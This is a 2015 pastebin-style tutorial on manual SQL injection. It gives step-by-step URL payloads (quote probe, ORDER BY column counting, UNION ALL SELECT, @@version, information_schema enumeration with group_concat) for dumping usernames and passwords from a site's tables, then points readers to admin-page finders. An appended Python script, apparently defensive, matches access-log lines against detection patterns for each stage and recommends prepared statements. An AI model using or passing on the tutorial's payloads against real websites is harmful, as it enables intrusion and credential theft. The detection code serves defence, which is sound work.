AlienSkillZ

SQL INJECTION MANUALLY

Jul 29th, 2015
**************************************
1.) Check whether it's vulnerable.
Add ' to the end of the URL.
******************************
2.) See how many columns the website has.
Type order by 7--
(Keep increasing the number until you reach an unknown column error.)

3.) Replace the number at the end of the URL with null, then delete the order by and type union all select 1,2,3,4,5,6,7--
(Put in the number of columns the site has, which is 7.)

(www.Facebook.com/products.php=12)

4.) You'll see a few numbers. Choose the top number or the bold one, and replace that number with @@Version

Note: After you hit enter, a pop-up of the community version will show. If it's below 5.0 you'll need to do a blind SQL injection.

5.) Replace @@Version with group_concat(table_name)
Then go to the very end of the URL and type from information_schema.tables where table_schema=database()--

6.) You'll get a list of table names if typed correctly.
Note: login, login_secured and users are probably your target ones, with the valuable information.

7.) In the URL bar, replace table_name with column_name
THEN
*Replace information_schema.tables with
information_schema.columns

8.) You'll see the list of all the columns the website has: Pass, username, cat, ID, mail, title, etc.
Note: For this tutorial we'll select the user and pass columns.

9.) Replace column_name with
username.

Note: If you just want the user name, just type username. To add more columns, put username,0x3a,pass with information_schema.columns
THEN
*Replace information_schema.columns where table_schema=database()-- with
users--

Note: It doesn't have to be users--; it could be login-- or login_secure, since those were among our tables.

10.) You'll see a list of user names and passwords. The user names come first since we put them first. Example: Alex252:27838427

Additional information: If you want to get to the admin accounts, go to Google and search "admin page finder".
Follow the site's instructions.

By: AlienSkills
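
Added example (not part of the original paste): each step above leaves a recognisable request in the web server's access log, so a defender can flag a client working through the sequence. The Python below matches URL-decoded query strings against one pattern per step; the log lines, addresses, path and the id parameter are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One signature per stage of the walkthrough, in the order the steps produce them.
STAGES = [
    ("quote_probe", re.compile(r"'\s*(?:&|$)")),                            # step 1
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),              # step 2
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),   # step 3
    ("version_probe", re.compile(r"@@version", re.I)),                      # step 4
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),  # steps 5-8
]

# Constructed access-log lines; addresses, path and parameter name are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Jul/2015:10:00:01 +0000] "GET /products.php?id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [29/Jul/2015:10:02:11 +0000] "GET /products.php?id=12%27 HTTP/1.1" 500 312
203.0.113.9 - - [29/Jul/2015:10:02:40 +0000] "GET /products.php?id=12+order+by+8-- HTTP/1.1" 500 310
203.0.113.9 - - [29/Jul/2015:10:03:02 +0000] "GET /products.php?id=null+union+all+select+1,@@version,3,4,5,6,7-- HTTP/1.1" 200 5133
203.0.113.9 - - [29/Jul/2015:10:03:30 +0000] "GET /products.php?id=null+union+all+select+1,2,3,4,5,6,7+from+information_schema.tables-- HTTP/1.1" 200 6001
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(query):
    """Return the stage names whose signature matches a URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in STAGES if rx.search(decoded)]


def scan(log_text):
    """Map client address -> distinct stages observed, in order of first appearance."""
    seen = {}
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for stage in classify(urlsplit(target).query):
            if stage not in seen.setdefault(client, []):
                seen[client].append(stage)
    return seen


if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

Pattern matching like this is a backstop for spotting the activity; the fix is for the page's query to bind the parameter as data (a prepared statement) instead of concatenating it into the SQL string.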